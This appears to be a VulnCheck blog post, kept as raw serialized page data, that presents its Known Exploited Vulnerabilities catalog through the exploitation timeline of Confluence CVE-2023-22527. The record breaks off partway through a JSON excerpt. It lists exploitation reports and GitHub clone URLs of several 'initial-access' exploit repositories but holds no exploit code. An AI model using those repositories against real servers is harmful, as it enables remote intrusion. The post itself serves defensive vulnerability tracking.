Anatomy of an Exploited CVE with VulnCheck KEV",[],[76699],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":76701,"toc":78331},[76702,76708,76712,76715,76718,76722,76728,76731,76742,76745,76825,76829,76832,76855,76858,77269,77273,77276,77279,78300,78304,78307,78311,78314,78321,78323,78328],[18,76703,76704],{},[68,76705],{":width":10862,"alt":76706,"src":76707},"The-Anatomy-of-an-Exploited-CVE","\u002Fblog\u002Fthe-anatomy-of-an-exploited-cve\u002FExploitation-Timeline-Atlassian.png",[61,76709,76711],{"id":76710},"welcome-to-the-vulncheck-kev-catalog","Welcome to the VulnCheck KEV Catalog",[18,76713,76714],{},"VulnCheck now offers access to a new Community resource, the VulnCheck Known Exploited Vulnerabilities (KEV) catalog. The free offering, available by joining the VulnCheck Community, provides advanced intelligence on vulnerabilities that have been exploited wild. VulnCheck’s KEV catalog provides organizations with earlier and broader visibility into known exploitation, along with publicly available references indicating where and when exploitation was reported from credible sources.",[18,76716,76717],{},"The VulnCheck KEV catalog can be accessed through our Community Edition via the VulnCheck KEV dashboard, machine-readable JSON, and the VulnCheck KEV API endpoint. To illustrate the value of the VulnCheck KEV, let's examine the exploitation timeline for a recent vulnerability.",[61,76719,76721],{"id":76720},"exploring-exploitation-of-atlassian-confluence-cve-2023-22527","Exploring Exploitation of Atlassian Confluence CVE-2023-22527",[18,76723,76724,76725],{},"For this demonstration, we'll use CVE-2023-22527, an Atlassian Confluence Server vulnerability added to CISA KEV on January 24th, 2024. We can explore the JSON data from VulnCheck KEV using the following URL: ",[47,76726,69377],{"href":69377,"rel":76727},[51],[18,76729,76730],{},"Reviewing the JSON, we observe the following timeline for the CVE:",[22,76732,76733,76736,76739],{},[25,76734,76735],{},"01-21-2024: Date of first observation by a public source",[25,76737,76738],{},"01-24-2024: Date added to CISA KEV",[25,76740,76741],{},"02-14-2024: Date by which CISA requires federal agencies to remediate the vulnerability",[18,76743,76744],{},"Example JSON from VulnCheck KEV:",[1354,76746,76748],{"className":22307,"code":76747,"language":22309,"meta":219,"style":219}," \"dueDate\": \"2024-02-14T00:00:00Z\",\n \"cisa_date_added\": \"2024-01-24T00:00:00Z\",\n \"date_added\": \"2024-01-21T00:00:00Z\",\n \"_timestamp\": \"2024-02-26T09:25:46.098273Z\"\n",[886,76749,76750,76770,76789,76808],{"__ignoreMap":219},[1373,76751,76752,76754,76757,76759,76761,76763,76766,76768],{"class":1375,"line":1376},[1373,76753,26357],{"class":1387},[1373,76755,76756],{"class":1391},"dueDate",[1373,76758,183],{"class":1387},[1373,76760,20051],{"class":4640},[1373,76762,183],{"class":1387},[1373,76764,76765],{"class":1391},"2024-02-14T00:00:00Z",[1373,76767,183],{"class":1387},[1373,76769,9062],{"class":4640},[1373,76771,76772,76774,76776,76778,76780,76782,76785,76787],{"class":1375,"line":220},[1373,76773,26357],{"class":1387},[1373,76775,13001],{"class":1391},[1373,76777,183],{"class":1387},[1373,76779,20051],{"class":4640},[1373,76781,183],{"class":1387},[1373,76783,76784],{"class":1391},"2024-01-24T00:00:00Z",[1373,76786,183],{"class":1387},[1373,76788,9062],{"class":4640},[1373,76790,76791,76793,76795,76797,76799,76801,76804,76806],{"class":1375,"line":1266},[1373,76792,26357],{"class":1387},[1373,76794,12998],{"class":1391},[1373,76796,183],{"class":1387},[1373,76798,20051],{"class":4640},[1373,76800,183],{"class":1387},[1373,76802,76803],{"class":1391},"2024-01-21T00:00:00Z",[1373,76805,183],{"class":1387},[1373,76807,9062],{"class":4640},[1373,76809,76810,76812,76814,76816,76818,76820,76823],{"class":1375,"line":1852},[1373,76811,26357],{"class":1387},[1373,76813,26501],{"class":1391},[1373,76815,183],{"class":1387},[1373,76817,20051],{"class":4640},[1373,76819,183],{"class":1387},[1373,76821,76822],{"class":1391},"2024-02-26T09:25:46.098273Z",[1373,76824,19057],{"class":1387},[61,76826,76828],{"id":76827},"exploring-references-for-known-exploitation","Exploring References for Known Exploitation",[18,76830,76831],{},"Now, with a high-level overview of the timeline of publicly known exploitation, let's examine the referenceable sources provided in VulnCheck KEV. For this CVE, there are nine available reference sources to date, including:",[22,76833,76834,76837,76840,76843,76846,76849,76852],{},[25,76835,76836],{},"01-21-2024 (First Seen): @TheDFIRReport",[25,76838,76839],{},"01-22-2024: ShadowServer",[25,76841,76842],{},"01-22-2024: Sans Internet Storm Center",[25,76844,76845],{},"01-23-2024: @catc0n",[25,76847,76848],{},"01-23-2024: Tenable Blog",[25,76850,76851],{},"02-01-2024: Fortiguard Threat Signal Report",[25,76853,76854],{},"02-21-2024: Imperva Blog",[18,76856,76857],{},"Example JSON of reported exploitation:",[1354,76859,76861],{"className":22307,"code":76860,"language":22309,"meta":219,"style":219},"\"vulncheck_reported_exploitation\": [\n {\n \"url\": \"https:\u002F\u002Fwww.cisa.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Ffeeds\u002Fknown_exploited_vulnerabilities.json\",\n \"date_added\": \"2024-01-24T00:00:00Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fmap\u002F?day=2024-01-22&host_type=src&vulnerability=cve-2023-22527\",\n \"date_added\": \"2024-01-22T00:00:00Z\"\n },\n {\n \"url\": \"https:\u002F\u002Ftwitter.com\u002FTheDFIRReport\u002Fstatus\u002F1749066611678466205\",\n \"date_added\": \"2024-01-21T00:00:00Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fisc.sans.edu\u002Fdiary\u002Frss\u002F30576\",\n \"date_added\": \"2024-01-22T00:00:00Z\"\n },\n {\n \"url\": \"https:\u002F\u002Ftwitter.com\u002FTheDFIRReport\u002Fstatus\u002F1749424404063232099?s=20\",\n \"date_added\": \"2024-01-22T00:00:00Z\"\n },\n {\n \"url\": \"https:\u002F\u002Ftwitter.com\u002Fcatc0n\u002Fstatus\u002F1749912359127105813?s=20\",\n \"date_added\": \"2024-01-23T00:00:00Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fwww.tenable.com\u002Fblog\u002Fcve-2023-22527-atlassian-confluence-data-center-and-server-template-injection-exploited-in-the\",\n \"date_added\": \"2024-01-23T00:00:00Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fwww.fortiguard.com\u002Fthreat-signal-report\u002F5376\u002Fatlassian-confluence-remote-code-execution-cve-2023-22527\",\n \"date_added\": \"2024-02-01T00:00:00Z\"\n },\n {\n \"url\": \"https:\u002F\u002Fwww.imperva.com\u002Fblog\u002Fattackers-quick-to-weaponize-cve-2023-22527-for-malware-delivery\u002F\",\n \"date_added\": \"2024-02-21T00:00:00Z\"\n }\n ]\n",[886,76862,76863,76875,76879,76898,76914,76918,76922,76941,76958,76962,76966,76985,77001,77005,77009,77027,77043,77047,77051,77070,77086,77090,77094,77113,77130,77134,77138,77157,77173,77177,77181,77200,77217,77221,77225,77243,77260,77264],{"__ignoreMap":219},[1373,76864,76865,76867,76869,76871,76873],{"class":1375,"line":1376},[1373,76866,183],{"class":1387},[1373,76868,28860],{"class":1391},[1373,76870,183],{"class":1387},[1373,76872,20051],{"class":4640},[1373,76874,9050],{"class":1383},[1373,76876,76877],{"class":1375,"line":220},[1373,76878,9788],{"class":1383},[1373,76880,76881,76883,76885,76887,76889,76891,76894,76896],{"class":1375,"line":1266},[1373,76882,28875],{"class":9152},[1373,76884,7585],{"class":9155},[1373,76886,183],{"class":9152},[1373,76888,4606],{"class":1383},[1373,76890,4883],{"class":9173},[1373,76892,76893],{"class":9176},"https:\u002F\u002Fwww.cisa.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Ffeeds\u002Fknown_exploited_vulnerabilities.json",[1373,76895,183],{"class":9173},[1373,76897,9062],{"class":1383},[1373,76899,76900,76902,76904,76906,76908,76910,76912],{"class":1375,"line":1852},[1373,76901,28875],{"class":9152},[1373,76903,12998],{"class":9155},[1373,76905,183],{"class":9152},[1373,76907,4606],{"class":1383},[1373,76909,4883],{"class":9173},[1373,76911,76784],{"class":9176},[1373,76913,19057],{"class":9173},[1373,76915,76916],{"class":1375,"line":4692},[1373,76917,28912],{"class":1383},[1373,76919,76920],{"class":1375,"line":4724},[1373,76921,9788],{"class":1383},[1373,76923,76924,76926,76928,76930,76932,76934,76937,76939],{"class":1375,"line":4756},[1373,76925,28875],{"class":9152},[1373,76927,7585],{"class":9155},[1373,76929,183],{"class":9152},[1373,76931,4606],{"class":1383},[1373,76933,4883],{"class":9173},[1373,76935,76936],{"class":9176},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fmap\u002F?day=2024-01-22&host_type=src&vulnerability=cve-2023-22527",[1373,76938,183],{"class":9173},[1373,76940,9062],{"class":1383},[1373,76942,76943,76945,76947,76949,76951,76953,76956],{"class":1375,"line":4768},[1373,76944,28875],{"class":9152},[1373,76946,12998],{"class":9155},[1373,76948,183],{"class":9152},[1373,76950,4606],{"class":1383},[1373,76952,4883],{"class":9173},[1373,76954,76955],{"class":9176},"2024-01-22T00:00:00Z",[1373,76957,19057],{"class":9173},[1373,76959,76960],{"class":1375,"line":4792},[1373,76961,28912],{"class":1383},[1373,76963,76964],{"class":1375,"line":4798},[1373,76965,9788],{"class":1383},[1373,76967,76968,76970,76972,76974,76976,76978,76981,76983],{"class":1375,"line":4806},[1373,76969,28875],{"class":9152},[1373,76971,7585],{"class":9155},[1373,76973,183],{"class":9152},[1373,76975,4606],{"class":1383},[1373,76977,4883],{"class":9173},[1373,76979,76980],{"class":9176},"https:\u002F\u002Ftwitter.com\u002FTheDFIRReport\u002Fstatus\u002F1749066611678466205",[1373,76982,183],{"class":9173},[1373,76984,9062],{"class":1383},[1373,76986,76987,76989,76991,76993,76995,76997,76999],{"class":1375,"line":4817},[1373,76988,28875],{"class":9152},[1373,76990,12998],{"class":9155},[1373,76992,183],{"class":9152},[1373,76994,4606],{"class":1383},[1373,76996,4883],{"class":9173},[1373,76998,76803],{"class":9176},[1373,77000,19057],{"class":9173},[1373,77002,77003],{"class":1375,"line":4825},[1373,77004,28912],{"class":1383},[1373,77006,77007],{"class":1375,"line":4835},[1373,77008,9788],{"class":1383},[1373,77010,77011,77013,77015,77017,77019,77021,77023,77025],{"class":1375,"line":4843},[1373,77012,28875],{"class":9152},[1373,77014,7585],{"class":9155},[1373,77016,183],{"class":9152},[1373,77018,4606],{"class":1383},[1373,77020,4883],{"class":9173},[1373,77022,74194],{"class":9176},[1373,77024,183],{"class":9173},[1373,77026,9062],{"class":1383},[1373,77028,77029,77031,77033,77035,77037,77039,77041],{"class":1375,"line":4849},[1373,77030,28875],{"class":9152},[1373,77032,12998],{"class":9155},[1373,77034,183],{"class":9152},[1373,77036,4606],{"class":1383},[1373,77038,4883],{"class":9173},[1373,77040,76955],{"class":9176},[1373,77042,19057],{"class":9173},[1373,77044,77045],{"class":1375,"line":4877},[1373,77046,28912],{"class":1383},[1373,77048,77049],{"class":1375,"line":4915},[1373,77050,9788],{"class":1383},[1373,77052,77053,77055,77057,77059,77061,77063,77066,77068],{"class":1375,"line":4931},[1373,77054,28875],{"class":9152},[1373,77056,7585],{"class":9155},[1373,77058,183],{"class":9152},[1373,77060,4606],{"class":1383},[1373,77062,4883],{"class":9173},[1373,77064,77065],{"class":9176},"https:\u002F\u002Ftwitter.com\u002FTheDFIRReport\u002Fstatus\u002F1749424404063232099?s=20",[1373,77067,183],{"class":9173},[1373,77069,9062],{"class":1383},[1373,77071,77072,77074,77076,77078,77080,77082,77084],{"class":1375,"line":4947},[1373,77073,28875],{"class":9152},[1373,77075,12998],{"class":9155},[1373,77077,183],{"class":9152},[1373,77079,4606],{"class":1383},[1373,77081,4883],{"class":9173},[1373,77083,76955],{"class":9176},[1373,77085,19057],{"class":9173},[1373,77087,77088],{"class":1375,"line":4952},[1373,77089,28912],{"class":1383},[1373,77091,77092],{"class":1375,"line":6776},[1373,77093,9788],{"class":1383},[1373,77095,77096,77098,77100,77102,77104,77106,77109,77111],{"class":1375,"line":6781},[1373,77097,28875],{"class":9152},[1373,77099,7585],{"class":9155},[1373,77101,183],{"class":9152},[1373,77103,4606],{"class":1383},[1373,77105,4883],{"class":9173},[1373,77107,77108],{"class":9176},"https:\u002F\u002Ftwitter.com\u002Fcatc0n\u002Fstatus\u002F1749912359127105813?s=20",[1373,77110,183],{"class":9173},[1373,77112,9062],{"class":1383},[1373,77114,77115,77117,77119,77121,77123,77125,77128],{"class":1375,"line":7524},[1373,77116,28875],{"class":9152},[1373,77118,12998],{"class":9155},[1373,77120,183],{"class":9152},[1373,77122,4606],{"class":1383},[1373,77124,4883],{"class":9173},[1373,77126,77127],{"class":9176},"2024-01-23T00:00:00Z",[1373,77129,19057],{"class":9173},[1373,77131,77132],{"class":1375,"line":7530},[1373,77133,28912],{"class":1383},[1373,77135,77136],{"class":1375,"line":7546},[1373,77137,9788],{"class":1383},[1373,77139,77140,77142,77144,77146,77148,77150,77153,77155],{"class":1375,"line":7571},[1373,77141,28875],{"class":9152},[1373,77143,7585],{"class":9155},[1373,77145,183],{"class":9152},[1373,77147,4606],{"class":1383},[1373,77149,4883],{"class":9173},[1373,77151,77152],{"class":9176},"https:\u002F\u002Fwww.tenable.com\u002Fblog\u002Fcve-2023-22527-atlassian-confluence-data-center-and-server-template-injection-exploited-in-the",[1373,77154,183],{"class":9173},[1373,77156,9062],{"class":1383},[1373,77158,77159,77161,77163,77165,77167,77169,77171],{"class":1375,"line":7598},[1373,77160,28875],{"class":9152},[1373,77162,12998],{"class":9155},[1373,77164,183],{"class":9152},[1373,77166,4606],{"class":1383},[1373,77168,4883],{"class":9173},[1373,77170,77127],{"class":9176},[1373,77172,19057],{"class":9173},[1373,77174,77175],{"class":1375,"line":7615},[1373,77176,28912],{"class":1383},[1373,77178,77179],{"class":1375,"line":7635},[1373,77180,9788],{"class":1383},[1373,77182,77183,77185,77187,77189,77191,77193,77196,77198],{"class":1375,"line":7640},[1373,77184,28875],{"class":9152},[1373,77186,7585],{"class":9155},[1373,77188,183],{"class":9152},[1373,77190,4606],{"class":1383},[1373,77192,4883],{"class":9173},[1373,77194,77195],{"class":9176},"https:\u002F\u002Fwww.fortiguard.com\u002Fthreat-signal-report\u002F5376\u002Fatlassian-confluence-remote-code-execution-cve-2023-22527",[1373,77197,183],{"class":9173},[1373,77199,9062],{"class":1383},[1373,77201,77202,77204,77206,77208,77210,77212,77215],{"class":1375,"line":7648},[1373,77203,28875],{"class":9152},[1373,77205,12998],{"class":9155},[1373,77207,183],{"class":9152},[1373,77209,4606],{"class":1383},[1373,77211,4883],{"class":9173},[1373,77213,77214],{"class":9176},"2024-02-01T00:00:00Z",[1373,77216,19057],{"class":9173},[1373,77218,77219],{"class":1375,"line":7672},[1373,77220,28912],{"class":1383},[1373,77222,77223],{"class":1375,"line":7688},[1373,77224,9788],{"class":1383},[1373,77226,77227,77229,77231,77233,77235,77237,77239,77241],{"class":1375,"line":7709},[1373,77228,28875],{"class":9152},[1373,77230,7585],{"class":9155},[1373,77232,183],{"class":9152},[1373,77234,4606],{"class":1383},[1373,77236,4883],{"class":9173},[1373,77238,74150],{"class":9176},[1373,77240,183],{"class":9173},[1373,77242,9062],{"class":1383},[1373,77244,77245,77247,77249,77251,77253,77255,77258],{"class":1375,"line":7714},[1373,77246,28875],{"class":9152},[1373,77248,12998],{"class":9155},[1373,77250,183],{"class":9152},[1373,77252,4606],{"class":1383},[1373,77254,4883],{"class":9173},[1373,77256,77257],{"class":9176},"2024-02-21T00:00:00Z",[1373,77259,19057],{"class":9173},[1373,77261,77262],{"class":1375,"line":7722},[1373,77263,9861],{"class":1383},[1373,77265,77266],{"class":1375,"line":9903},[1373,77267,77268],{"class":1383}," ]\n",[61,77270,77272],{"id":77271},"expanding-the-view-into-publicly-available-exploits","Expanding the View Into Publicly Available Exploits",[18,77274,77275],{},"Notably, the first publicly available exploit on GitHub was accessible on 1-17-2024, before the vulnerability was published to VulnCheck KEV (Available in our commercial exploit feeds). After the first known exploitation was seen on 01-21-2024, there have been ten additional exploits posted on GitHub: three on 01-22-2024, three on 01-23-2024, three on 01-24-2024, and one on 02-02-2024.",[18,77277,77278],{},"Example JSON of Publicly Available Exploits:",[1354,77280,77282],{"className":22307,"code":77281,"language":22309,"meta":219,"style":219}," \"vulncheck_xdb\": [\n {\n \"xdb_id\": \"b86f8af644dc\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb86f8af644dc\",\n \"date_added\": \"2024-01-23T09:28:53Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:Niuwoo\u002FCVE-2023-22527.git\"\n },\n {\n \"xdb_id\": \"b6e41e9efa89\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb6e41e9efa89\",\n \"date_added\": \"2024-01-24T21:29:59Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:Privia-Security\u002FCVE-2023-22527.git\"\n },\n {\n \"xdb_id\": \"66eb62ffb562\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F66eb62ffb562\",\n \"date_added\": \"2024-01-22T11:38:55Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:Drun1baby\u002FCVE-2023-22527.git\"\n },\n {\n \"xdb_id\": \"2054e543b959\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F2054e543b959\",\n \"date_added\": \"2024-01-22T13:26:45Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:cleverg0d\u002FCVE-2023-22527.git\"\n },\n {\n \"xdb_id\": \"242d461849bd\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F242d461849bd\",\n \"date_added\": \"2024-01-17T10:21:00Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:ga0we1\u002FCVE-2023-22527_Confluence_RCE.git\"\n },\n {\n \"xdb_id\": \"4530fd2e7aec\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F4530fd2e7aec\",\n \"date_added\": \"2024-01-24T04:44:59Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:yoryio\u002FCVE-2023-22527.git\"\n },\n {\n \"xdb_id\": \"d6ff5abefc7e\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fd6ff5abefc7e\",\n \"date_added\": \"2024-01-22T19:02:59Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:thanhlam-attt\u002FCVE-2023-22527.git\"\n },\n {\n \"xdb_id\": \"30d9851d825e\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F30d9851d825e\",\n \"date_added\": \"2024-01-23T10:55:28Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:Chocapikk\u002FCVE-2023-22527.git\"\n },\n {\n \"xdb_id\": \"4875746a557f\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F4875746a557f\",\n \"date_added\": \"2024-02-02T04:20:14Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:YongYe-Security\u002FCVE-2023-22527.git\"\n },\n {\n \"xdb_id\": \"a3677d9bae7f\",\n \"xdb_url\": \"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fa3677d9bae7f\",\n \"date_added\": \"2024-01-23T07:10:55Z\",\n \"exploit_type\": \"initial-access\",\n \"clone_ssh_url\": \"git@github.com:VNCERT-CC\u002FCVE-2023-22527-confluence.git\"\n }\n ]\n",[886,77283,77284,77296,77300,77319,77338,77357,77375,77392,77396,77400,77419,77438,77457,77475,77492,77496,77500,77519,77538,77557,77575,77592,77596,77600,77619,77638,77657,77675,77692,77696,77700,77719,77738,77757,77775,77792,77796,77800,77819,77838,77857,77875,77892,77896,77900,77919,77938,77957,77975,77992,77996,78000,78019,78038,78057,78075,78092,78096,78100,78119,78138,78157,78175,78192,78196,78200,78219,78238,78257,78275,78292,78296],{"__ignoreMap":219},[1373,77285,77286,77288,77290,77292,77294],{"class":1375,"line":1376},[1373,77287,26357],{"class":1387},[1373,77289,22318],{"class":1391},[1373,77291,183],{"class":1387},[1373,77293,20051],{"class":4640},[1373,77295,9050],{"class":1383},[1373,77297,77298],{"class":1375,"line":220},[1373,77299,9788],{"class":1383},[1373,77301,77302,77304,77306,77308,77310,77312,77315,77317],{"class":1375,"line":1266},[1373,77303,28875],{"class":9152},[1373,77305,22335],{"class":9155},[1373,77307,183],{"class":9152},[1373,77309,4606],{"class":1383},[1373,77311,4883],{"class":9173},[1373,77313,77314],{"class":9176},"b86f8af644dc",[1373,77316,183],{"class":9173},[1373,77318,9062],{"class":1383},[1373,77320,77321,77323,77325,77327,77329,77331,77334,77336],{"class":1375,"line":1852},[1373,77322,28875],{"class":9152},[1373,77324,22355],{"class":9155},[1373,77326,183],{"class":9152},[1373,77328,4606],{"class":1383},[1373,77330,4883],{"class":9173},[1373,77332,77333],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb86f8af644dc",[1373,77335,183],{"class":9173},[1373,77337,9062],{"class":1383},[1373,77339,77340,77342,77344,77346,77348,77350,77353,77355],{"class":1375,"line":4692},[1373,77341,28875],{"class":9152},[1373,77343,12998],{"class":9155},[1373,77345,183],{"class":9152},[1373,77347,4606],{"class":1383},[1373,77349,4883],{"class":9173},[1373,77351,77352],{"class":9176},"2024-01-23T09:28:53Z",[1373,77354,183],{"class":9173},[1373,77356,9062],{"class":1383},[1373,77358,77359,77361,77363,77365,77367,77369,77371,77373],{"class":1375,"line":4724},[1373,77360,28875],{"class":9152},[1373,77362,22394],{"class":9155},[1373,77364,183],{"class":9152},[1373,77366,4606],{"class":1383},[1373,77368,4883],{"class":9173},[1373,77370,1281],{"class":9176},[1373,77372,183],{"class":9173},[1373,77374,9062],{"class":1383},[1373,77376,77377,77379,77381,77383,77385,77387,77390],{"class":1375,"line":4756},[1373,77378,28875],{"class":9152},[1373,77380,22413],{"class":9155},[1373,77382,183],{"class":9152},[1373,77384,4606],{"class":1383},[1373,77386,4883],{"class":9173},[1373,77388,77389],{"class":9176},"git@github.com:Niuwoo\u002FCVE-2023-22527.git",[1373,77391,19057],{"class":9173},[1373,77393,77394],{"class":1375,"line":4768},[1373,77395,28912],{"class":1383},[1373,77397,77398],{"class":1375,"line":4792},[1373,77399,9788],{"class":1383},[1373,77401,77402,77404,77406,77408,77410,77412,77415,77417],{"class":1375,"line":4798},[1373,77403,28875],{"class":9152},[1373,77405,22335],{"class":9155},[1373,77407,183],{"class":9152},[1373,77409,4606],{"class":1383},[1373,77411,4883],{"class":9173},[1373,77413,77414],{"class":9176},"b6e41e9efa89",[1373,77416,183],{"class":9173},[1373,77418,9062],{"class":1383},[1373,77420,77421,77423,77425,77427,77429,77431,77434,77436],{"class":1375,"line":4806},[1373,77422,28875],{"class":9152},[1373,77424,22355],{"class":9155},[1373,77426,183],{"class":9152},[1373,77428,4606],{"class":1383},[1373,77430,4883],{"class":9173},[1373,77432,77433],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb6e41e9efa89",[1373,77435,183],{"class":9173},[1373,77437,9062],{"class":1383},[1373,77439,77440,77442,77444,77446,77448,77450,77453,77455],{"class":1375,"line":4817},[1373,77441,28875],{"class":9152},[1373,77443,12998],{"class":9155},[1373,77445,183],{"class":9152},[1373,77447,4606],{"class":1383},[1373,77449,4883],{"class":9173},[1373,77451,77452],{"class":9176},"2024-01-24T21:29:59Z",[1373,77454,183],{"class":9173},[1373,77456,9062],{"class":1383},[1373,77458,77459,77461,77463,77465,77467,77469,77471,77473],{"class":1375,"line":4825},[1373,77460,28875],{"class":9152},[1373,77462,22394],{"class":9155},[1373,77464,183],{"class":9152},[1373,77466,4606],{"class":1383},[1373,77468,4883],{"class":9173},[1373,77470,1281],{"class":9176},[1373,77472,183],{"class":9173},[1373,77474,9062],{"class":1383},[1373,77476,77477,77479,77481,77483,77485,77487,77490],{"class":1375,"line":4835},[1373,77478,28875],{"class":9152},[1373,77480,22413],{"class":9155},[1373,77482,183],{"class":9152},[1373,77484,4606],{"class":1383},[1373,77486,4883],{"class":9173},[1373,77488,77489],{"class":9176},"git@github.com:Privia-Security\u002FCVE-2023-22527.git",[1373,77491,19057],{"class":9173},[1373,77493,77494],{"class":1375,"line":4843},[1373,77495,28912],{"class":1383},[1373,77497,77498],{"class":1375,"line":4849},[1373,77499,9788],{"class":1383},[1373,77501,77502,77504,77506,77508,77510,77512,77515,77517],{"class":1375,"line":4877},[1373,77503,28875],{"class":9152},[1373,77505,22335],{"class":9155},[1373,77507,183],{"class":9152},[1373,77509,4606],{"class":1383},[1373,77511,4883],{"class":9173},[1373,77513,77514],{"class":9176},"66eb62ffb562",[1373,77516,183],{"class":9173},[1373,77518,9062],{"class":1383},[1373,77520,77521,77523,77525,77527,77529,77531,77534,77536],{"class":1375,"line":4915},[1373,77522,28875],{"class":9152},[1373,77524,22355],{"class":9155},[1373,77526,183],{"class":9152},[1373,77528,4606],{"class":1383},[1373,77530,4883],{"class":9173},[1373,77532,77533],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F66eb62ffb562",[1373,77535,183],{"class":9173},[1373,77537,9062],{"class":1383},[1373,77539,77540,77542,77544,77546,77548,77550,77553,77555],{"class":1375,"line":4931},[1373,77541,28875],{"class":9152},[1373,77543,12998],{"class":9155},[1373,77545,183],{"class":9152},[1373,77547,4606],{"class":1383},[1373,77549,4883],{"class":9173},[1373,77551,77552],{"class":9176},"2024-01-22T11:38:55Z",[1373,77554,183],{"class":9173},[1373,77556,9062],{"class":1383},[1373,77558,77559,77561,77563,77565,77567,77569,77571,77573],{"class":1375,"line":4947},[1373,77560,28875],{"class":9152},[1373,77562,22394],{"class":9155},[1373,77564,183],{"class":9152},[1373,77566,4606],{"class":1383},[1373,77568,4883],{"class":9173},[1373,77570,1281],{"class":9176},[1373,77572,183],{"class":9173},[1373,77574,9062],{"class":1383},[1373,77576,77577,77579,77581,77583,77585,77587,77590],{"class":1375,"line":4952},[1373,77578,28875],{"class":9152},[1373,77580,22413],{"class":9155},[1373,77582,183],{"class":9152},[1373,77584,4606],{"class":1383},[1373,77586,4883],{"class":9173},[1373,77588,77589],{"class":9176},"git@github.com:Drun1baby\u002FCVE-2023-22527.git",[1373,77591,19057],{"class":9173},[1373,77593,77594],{"class":1375,"line":6776},[1373,77595,28912],{"class":1383},[1373,77597,77598],{"class":1375,"line":6781},[1373,77599,9788],{"class":1383},[1373,77601,77602,77604,77606,77608,77610,77612,77615,77617],{"class":1375,"line":7524},[1373,77603,28875],{"class":9152},[1373,77605,22335],{"class":9155},[1373,77607,183],{"class":9152},[1373,77609,4606],{"class":1383},[1373,77611,4883],{"class":9173},[1373,77613,77614],{"class":9176},"2054e543b959",[1373,77616,183],{"class":9173},[1373,77618,9062],{"class":1383},[1373,77620,77621,77623,77625,77627,77629,77631,77634,77636],{"class":1375,"line":7530},[1373,77622,28875],{"class":9152},[1373,77624,22355],{"class":9155},[1373,77626,183],{"class":9152},[1373,77628,4606],{"class":1383},[1373,77630,4883],{"class":9173},[1373,77632,77633],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F2054e543b959",[1373,77635,183],{"class":9173},[1373,77637,9062],{"class":1383},[1373,77639,77640,77642,77644,77646,77648,77650,77653,77655],{"class":1375,"line":7546},[1373,77641,28875],{"class":9152},[1373,77643,12998],{"class":9155},[1373,77645,183],{"class":9152},[1373,77647,4606],{"class":1383},[1373,77649,4883],{"class":9173},[1373,77651,77652],{"class":9176},"2024-01-22T13:26:45Z",[1373,77654,183],{"class":9173},[1373,77656,9062],{"class":1383},[1373,77658,77659,77661,77663,77665,77667,77669,77671,77673],{"class":1375,"line":7571},[1373,77660,28875],{"class":9152},[1373,77662,22394],{"class":9155},[1373,77664,183],{"class":9152},[1373,77666,4606],{"class":1383},[1373,77668,4883],{"class":9173},[1373,77670,1281],{"class":9176},[1373,77672,183],{"class":9173},[1373,77674,9062],{"class":1383},[1373,77676,77677,77679,77681,77683,77685,77687,77690],{"class":1375,"line":7598},[1373,77678,28875],{"class":9152},[1373,77680,22413],{"class":9155},[1373,77682,183],{"class":9152},[1373,77684,4606],{"class":1383},[1373,77686,4883],{"class":9173},[1373,77688,77689],{"class":9176},"git@github.com:cleverg0d\u002FCVE-2023-22527.git",[1373,77691,19057],{"class":9173},[1373,77693,77694],{"class":1375,"line":7615},[1373,77695,28912],{"class":1383},[1373,77697,77698],{"class":1375,"line":7635},[1373,77699,9788],{"class":1383},[1373,77701,77702,77704,77706,77708,77710,77712,77715,77717],{"class":1375,"line":7640},[1373,77703,28875],{"class":9152},[1373,77705,22335],{"class":9155},[1373,77707,183],{"class":9152},[1373,77709,4606],{"class":1383},[1373,77711,4883],{"class":9173},[1373,77713,77714],{"class":9176},"242d461849bd",[1373,77716,183],{"class":9173},[1373,77718,9062],{"class":1383},[1373,77720,77721,77723,77725,77727,77729,77731,77734,77736],{"class":1375,"line":7648},[1373,77722,28875],{"class":9152},[1373,77724,22355],{"class":9155},[1373,77726,183],{"class":9152},[1373,77728,4606],{"class":1383},[1373,77730,4883],{"class":9173},[1373,77732,77733],{"class":9176},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F242d461849bd",[1373,77735,183],{"class":9173},[1373,77737,9062],{"class":1383},[1373,77739,77740,77742,77744,77746,77748,77750,77753,77755],{"class":1375,"line":7672},[1373,77